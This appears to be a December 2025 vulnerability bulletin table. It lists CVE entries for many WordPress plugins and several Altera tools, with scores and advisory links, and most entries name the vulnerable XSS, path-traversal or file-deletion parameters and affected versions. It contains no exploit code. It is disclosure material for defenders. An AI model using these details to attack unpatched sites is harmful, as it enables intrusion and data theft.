| zealopensource--Accept Stripe Payments Using Contact Form 7 | The Accept Stripe Payments Using Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'failure_message' parameter in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-12834 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9e77e3f-dcd8-426a-be0f-24eb65c6709e?source=cve https://plugins.trac.wordpress.org/browser/accept-stripe-payments-using-contact-form-7/tags/3.1/inc/lib/class.cf7sa.lib.php#L696 |
| iworks--Simple CSV Table | The Simple CSV Table plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.1 via the `href` parameter in the `[csv]` shortcode. This is due to insufficient path validation before concatenating user-supplied input to a base directory path. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys. | 2025-12-12 | 6.5 | CVE-2025-12960 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff9abb4-2b25-4bbb-86b4-fb1ba37e122f?source=cve https://plugins.trac.wordpress.org/browser/simple-csv-table/tags/1.0.1/simple-csv-table.php#L71 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403210%40simple-csv-table&new=3403210%40simple-csv-table&sfp_email=&sfph_mail= |
| nalam-1--Magical Posts Display Elementor Advanced Posts widgets | The Magical Posts Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mpac_title_tag' parameter in the Magical Posts Accordion widget in all versions up to, and including, 1.2.54 due to insufficient input sanitization and output escaping on user-supplied HTML tag names. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-12965 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8352400f-fea1-486d-872a-66340300cee9?source=cve https://wordpress.org/plugins/magical-posts-display/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3407965%40magical-posts-display&new=3407965%40magical-posts-display&sfp_email=&sfph_mail=#file34 |
| wpusermanager--WP User Manager User Profile Builder & Membership | The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled. | 2025-12-12 | 6.8 | CVE-2025-13320 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70 https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70 https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75 https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75 https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86 https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86 |
| Altera--Quartus Prime Pro | Under certain circumstances, the Quartus Prime Pro Installer for Windows does not check the permissions of the Quartus target installation directory if the target installation directory already exists. | 2025-12-11 | 6.7 | CVE-2025-13663 | https://www.altera.com/security/security-advisory/asa-0001 |
| Altera--Quartus Prime Standard | A potential security vulnerability in Quartus® Prime Standard Edition Design Software may allow escalation of privilege. | 2025-12-11 | 6.7 | CVE-2025-13664 | https://www.altera.com/security/security-advisory/asa-0002 |
| Altera--Quartus Prime Standard | The System Console Utility for Windows is vulnerable to a DLL planting vulnerability. | 2025-12-12 | 6.7 | CVE-2025-13665 | https://www.altera.com/security/security-advisory/asa-0002 |
| Altera--Quartus Prime Pro | A potential security vulnerability in Quartus® Prime Pro Edition Design Software may allow escalation of privilege. | 2025-12-11 | 6.7 | CVE-2025-13668 | https://www.altera.com/security/security-advisory/asa-0001 |
| Altera--High Level Synthesis Compiler | Uncontrolled Search Path Element vulnerability in Altera High Level Synthesis Compiler on Windows allows Search Order Hijacking. This issue affects High Level Synthesis Compiler: from 19.1 through 24.3. | 2025-12-12 | 6.7 | CVE-2025-13669 | https://www.altera.com/security/security-advisory/asa-0003 |
| Altera--High Level Synthesis Compiler | The High Level Synthesis Compiler i++ command for Windows is vulnerable to a DLL planting vulnerability. | 2025-12-12 | 6.7 | CVE-2025-13670 | https://www.altera.com/security/security-advisory/asa-0003 |
| blakelong--Custom Frames | The Custom Frames plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter of the 'customframe' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-13705 | https://www.wordfence.com/threat-intel/vulnerabilities/id/56f3aa7a-a6f2-42c7-b855-b083fe58f466?source=cve https://plugins.trac.wordpress.org/browser/custom-frames/trunk/class.customframes.php#L65 https://plugins.trac.wordpress.org/browser/custom-frames/tags/1.0.1/class.customframes.php#L65 |
| ice00--NewStatPress | The NewStatPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a regex bypass in nsp_shortcode function in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13747 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e7ddc418-9458-4335-afdc-6d40c7e23060?source=cve https://plugins.trac.wordpress.org/browser/newstatpress/tags/1.4.3/includes/nsp-core.php#L637 |
| jenyay--LJUsers | The LJUsers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the 'ljuser' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13839 | https://www.wordfence.com/threat-intel/vulnerabilities/id/841adf53-930a-4286-96d0-9ee8b0c188c4?source=cve https://plugins.trac.wordpress.org/browser/ljusers/trunk/ljusers.php#L194 https://plugins.trac.wordpress.org/browser/ljusers/tags/1.2.0/ljusers.php#L194 |
| bobvanoorschot--BUKAZU Search widget | The BUKAZU Search widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'shortcode' parameter of the 'bukazu_search' shortcode in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13840 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a666d0e4-4fa7-4794-b270-afbccf5036c6?source=cve https://plugins.trac.wordpress.org/browser/bukazu-search-widget/trunk/bukazu-widget.php#L277 https://plugins.trac.wordpress.org/browser/bukazu-search-widget/tags/3.3.2/bukazu-widget.php#L277 |
| susantabeura--VigLink SpotLight By ShortCode | The VigLink SpotLight By ShortCode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'float' parameter of the 'spotlight' shortcode in all versions up to, and including, 1.0.a due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f1275a8f-c9ac-4cb3-8aa2-1393ffcc9dc8?source=cve https://plugins.trac.wordpress.org/browser/viglink-spotlight-by-shortcode/trunk/spotlight.php#L20 https://plugins.trac.wordpress.org/browser/viglink-spotlight-by-shortcode/tags/1.0.a/spotlight.php#L20 |
| qrevo--Easy Map Creator | The Easy Map Creator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13846 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e185479-843c-4748-83e5-ae0b300c3fc7?source=cve https://plugins.trac.wordpress.org/browser/easy-map-creator/trunk/easy_map_creator.php#L139 https://plugins.trac.wordpress.org/browser/easy-map-creator/tags/3.0.2/easy_map_creator.php#L139 |
| ladislavsoukupgmailcom--LS Google Map Router | The LS Google Map Router plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'map_type' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13850 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3581172-10d8-4b11-95f7-ee1835e29606?source=cve https://plugins.trac.wordpress.org/browser/ls-gmap-route/trunk/ls-gmap_route.php#L61 https://plugins.trac.wordpress.org/browser/ls-gmap-route/tags/1.1.0/ls-gmap_route.php#L61 |
| looks_awesome--Flow-Flow Social Feed Stream | The Flow-Flow Social Feed Stream plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the flow_flow_social_auth AJAX action in versions 3.0.0 to 4.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings and store arbitrary JavaScript that executes whenever the plugin settings page is viewed. | 2025-12-12 | 6.4 | CVE-2025-13866 | https://www.wordfence.com/threat-intel/vulnerabilities/id/065d01b6-30e0-4bc8-bd70-25996c2df879?source=cve https://plugins.trac.wordpress.org/browser/flow-flow-social-streams/trunk/includes/db/FFDBManager.php#L24 https://plugins.trac.wordpress.org/browser/flow-flow-social-streams/trunk/includes/FlowFlowActivator.php#L224 |
| buntegiraffe--Hide Email Address | The Hide Email Address plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'inline_css' parameter in the `bg-hide-email-address` shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13884 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a770ab37-127a-4018-9ffa-1b326d5a016e?source=cve https://plugins.trac.wordpress.org/browser/bg-hide-email-address/trunk/BgHideEmailAddress.php#L101 https://plugins.trac.wordpress.org/browser/bg-hide-email-address/tags/0.1/BgHideEmailAddress.php#L101 |
| imran3229--Zenost Shortcodes | The Zenost Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' and 'target' parameters in the `button` shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13885 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c88d378a-6c58-4670-b0b6-0e0d51c39bd1?source=cve https://plugins.trac.wordpress.org/browser/zenost-shortcodes/trunk/inc/shortcodes.php#L25 https://plugins.trac.wordpress.org/browser/zenost-shortcodes/tags/1.0/inc/shortcodes.php#L25 |
| tmus--Simple Nivo Slider | The Simple Nivo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode parameter in all versions up to, and including, 0.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13889 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1c343c-ef16-4468-a983-0dc9fd152dd5?source=cve https://plugins.trac.wordpress.org/browser/simple-nivo-slider/tags/0.5.6/simple-nivo-slider.php#L208 https://plugins.trac.wordpress.org/browser/simple-nivo-slider/trunk/simple-nivo-slider.php#L208 |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Image Gallery - Photo Grid & Video Gallery plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.13.3. This is due to the modula_list_folders AJAX endpoint that lacks proper path validation and base directory restrictions. While the endpoint verifies user capabilities (Author+ with upload_files and edit_posts permissions), it fails to validate that user-supplied directory paths reside within safe directories. This makes it possible for authenticated attackers, with Author-level access and above, to enumerate arbitrary directories on the server via the modula_list_folders endpoint. | 2025-12-12 | 6.5 | CVE-2025-13891 | https://www.wordfence.com/threat-intel/vulnerabilities/id/71e587ec-ceb6-48ca-9a1a-599d9d988b4d?source=cve https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L230 https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L160 https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L411 https://research.cleantalk.org/cve-2025-13891/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3414176%40modula-best-grid-gallery%2Ftrunk&old=3407949%40modula-best-grid-gallery%2Ftrunk&sfp_email=&sfph_mail= |
| lesion--WPGancio | The WPGancio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gancio-event' shortcode in all versions up to, and including, 1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13904 | https://www.wordfence.com/threat-intel/vulnerabilities/id/593fefe1-8813-440b-b8c7-fbfd5b71a737?source=cve https://plugins.trac.wordpress.org/browser/wpgancio/trunk/wc.php#L33 https://plugins.trac.wordpress.org/browser/wpgancio/tags/1.12/wc.php#L33 |
| ysh--WP Flot | The WP Flot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linechart' shortcode in all versions up to, and including, 0.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13906 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4905ca1-3096-45c5-838b-1237888fb969?source=cve https://plugins.trac.wordpress.org/browser/wp-flot/trunk/wpflot.php#L101 https://plugins.trac.wordpress.org/browser/wp-flot/tags/0.2.2/wpflot.php#L101 |
| davidkeen--GPXpress | The GPXpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gpxpress' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13960 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2bf5c47-11e6-462d-a671-3f5e94e9e7e5?source=cve https://plugins.trac.wordpress.org/browser/gpxpress/trunk/includes/Gpxpress.php#L152 https://plugins.trac.wordpress.org/browser/gpxpress/tags/1.3/includes/Gpxpress.php#L152 |
| subhransu-sekhar--Data Visualizer | The Data Visualizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'visualize' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13961 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac7aeb6a-4e41-4301-8e79-ffe1468c0940?source=cve https://plugins.trac.wordpress.org/browser/data-visualizer/trunk/data-visualizer.php#L92 https://plugins.trac.wordpress.org/browser/data-visualizer/tags/1.1/data-visualizer.php#L92 |
| klemmkeil--Divelogs Widget | The Divelogs Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'latestdive' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13962 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cbb3378a-d3e8-4a31-9ed2-f580960878cf?source=cve https://plugins.trac.wordpress.org/browser/divelogs-widget/trunk/divelogs-widget.php#L51 https://plugins.trac.wordpress.org/browser/divelogs-widget/tags/1.5/divelogs-widget.php#L51 https://plugins.trac.wordpress.org/changeset/3415821/ |
| falselight--FX Currency Converter | The FX Currency Converter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fxcc_convert' shortcode in all versions up to, and including, 0.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13963 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d01a7887-afd7-418b-99ad-92157582a506?source=cve https://plugins.trac.wordpress.org/browser/fx-currency-converter/trunk/includes/shortcode.php#L57 https://plugins.trac.wordpress.org/browser/fx-currency-converter/tags/0.2.0/includes/shortcode.php#L57 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3415819%40fx-currency-converter&new=3415819%40fx-currency-converter&sfp_email=&sfph_mail= |
| sonlamtn200--Paypal Payment Shortcode | The Paypal Payment Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'buttom_image' parameter of the [paypal-shortcode] shortcode in all versions up to, and including, 1.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13966 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0b1fbb1-fc2c-4eb9-89c6-364ca8c385db?source=cve https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/trunk/sls-paypal-payments-shortcode.php#L10 https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/tags/1.01/sls-paypal-payments-shortcode.php#L10 https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/trunk/sls-paypal-payments-shortcode.php#L55 https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/tags/1.01/sls-paypal-payments-shortcode.php#L55 |
| eurisko--Reviews Sorted | The Reviews Sorted plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'space' parameter of the [reviews-slider] shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13969 | https://www.wordfence.com/threat-intel/vulnerabilities/id/74e790e7-60fd-45cd-942f-0f24365d7fc8?source=cve https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/functions/do.php#L138 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/functions/do.php#L138 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider-1.php#L30 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider-1.php#L30 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider-2.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider-2.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider-3.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider-3.php#L23 |
| thobian-- | The 评论小秘书 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.3.2. This is due to insufficient input sanitization and output escaping on the `$_SERVER['PHP_SELF']` variable in the plugin's settings page. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-13988 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b24506c2-bf5e-4c71-94a5-c557a09f9f0d?source=cve https://plugins.trac.wordpress.org/browser/comments-secretary/trunk/tho_fetion.php#L173 https://plugins.trac.wordpress.org/browser/comments-secretary/tags/1.3.2/tho_fetion.php#L173 |
| nazsabuz--WP Dropzone | The WP Dropzone plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'callback' shortcode attribute in all versions up to, and including, 1.1.1. This is due to insufficient input sanitization and output escaping on user-supplied 'callback' attributes, which are evaluated as JavaScript code via the `new Function()` constructor. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13989 | https://www.wordfence.com/threat-intel/vulnerabilities/id/23953909-4836-4226-b00b-eb0e24cc3ad7?source=cve https://plugins.trac.wordpress.org/browser/wp-dropzone/trunk/includes/class-plugin.php#L303 https://plugins.trac.wordpress.org/browser/wp-dropzone/trunk/js/wp-dropzone.js#L86 https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.1/includes/class-plugin.php#L303 https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.1/js/wp-dropzone.js#L86 |
| soportecibeles--AI Feeds | The AI Feeds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'aife_post_meta' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14030 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d33721e2-0a90-4102-84d5-2633c0fd47ed?source=cve https://plugins.trac.wordpress.org/browser/ai-feeds/trunk/includes/functions.php#L58 https://plugins.trac.wordpress.org/browser/ai-feeds/tags/1.0.12/includes/functions.php#L58 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417124%40ai-feeds&new=3417124%40ai-feeds&sfp_email=&sfph_mail= |
| boldthemes--Bold Timeline Lite | The Bold Timeline Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in the 'bold_timeline_group' shortcode in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14032 | https://www.wordfence.com/threat-intel/vulnerabilities/id/840fd950-3ce3-4068-b8bc-270f168a5091?source=cve https://wordpress.org/plugins/bold-timeline-lite https://plugins.trac.wordpress.org/browser/bold-timeline-lite/trunk/assets/views/bold_timeline_group_view.php#L79 https://plugins.trac.wordpress.org/browser/bold-timeline-lite/tags/1.2.7/assets/views/bold_timeline_group_view.php#L79 |
| e4jvikwp--VikRentItems Flexible Rental Management System | The VikRentItems Flexible Rental Management System plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'delto' parameter in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14049 | https://www.wordfence.com/threat-intel/vulnerabilities/id/51b56dc5-0d2d-4fa9-872c-4193f61c165f?source=cve https://plugins.trac.wordpress.org/browser/vikrentitems/trunk/site/views/deliverymap/tmpl/default.php#L277 https://plugins.trac.wordpress.org/browser/vikrentitems/tags/1.2.0/site/views/deliverymap/tmpl/default.php#L277 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414595%40vikrentitems&new=3414595%40vikrentitems&sfp_email=&sfph_mail= |
| cytechltd--BuddyTask | The BuddyTask plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on multiple AJAX endpoints in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view, create, modify, and delete task boards belonging to any BuddyPress group, including private and hidden groups they are not members of. | 2025-12-12 | 6.5 | CVE-2025-14064 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfe0947-5790-49ba-aa3d-6bc61c12b355?source=cve https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L458 https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L666 https://cwe.mitre.org/data/definitions/862.html https://plugins.trac.wordpress.org/browser/buddytask/tags/1.3.0/buddytask.php#L458 https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L763 https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L840 https://plugins.trac.wordpress.org/changeset/3416754/ |
| themebon--App Landing Template Blocks for WPBakery (Visual Composer) Page Builder | The App Landing Template Blocks for WPBakery (Visual Composer) Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'atvc_video_play' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14119 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c440ae0-311d-4d0a-a216-7641c2a80669?source=cve https://plugins.trac.wordpress.org/browser/app-template-blocks-for-wpbakery-page-builder/trunk/modules/video-play.php#L58 https://plugins.trac.wordpress.org/browser/app-template-blocks-for-wpbakery-page-builder/tags/2.0.2/modules/video-play.php#L58 |
| andru1--Complag | The Complag plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14125 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1bdae07c-cb80-4566-9b90-7b144c6ceeb0?source=cve https://plugins.trac.wordpress.org/browser/omplag/trunk/complag.php#L37 https://plugins.trac.wordpress.org/browser/omplag/tags/1.0.2/complag.php#L37 |
| wasiul99--Like DisLike Voting | The Like DisLike Voting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14129 | https://www.wordfence.com/threat-intel/vulnerabilities/id/25dfa483-26c6-43d1-9a24-9ea245b54f4c?source=cve https://wordpress.org/plugins/like-dislike-voting/ https://plugins.trac.wordpress.org/browser/like-dislike-voting/trunk/files/function.php#L76 https://plugins.trac.wordpress.org/browser/like-dislike-voting/tags/1.0.1/files/function.php#L76 |
| pandikamal03--Category Dropdown List | The Category Dropdown List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14132 | https://www.wordfence.com/threat-intel/vulnerabilities/id/baac847b-3c5e-44c4-bccf-fcbde1adf37f?source=cve https://plugins.trac.wordpress.org/browser/dropdown-category-list/trunk/settings.php#L11 https://plugins.trac.wordpress.org/browser/dropdown-category-list/tags/1.0/settings.php#L11 |
| alexdtn--Simple AL Slider | The Simple AL Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14137 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e12e2ba1-fc4f-4ad0-80da-3504ef1e13d3?source=cve https://wordpress.org/plugins/simple-al-slider/ https://plugins.trac.wordpress.org/browser/simple-al-slider/trunk/templates/admin/header.tpl#L46 https://plugins.trac.wordpress.org/browser/simple-al-slider/tags/1.2.10/templates/admin/header.tpl#L46 |
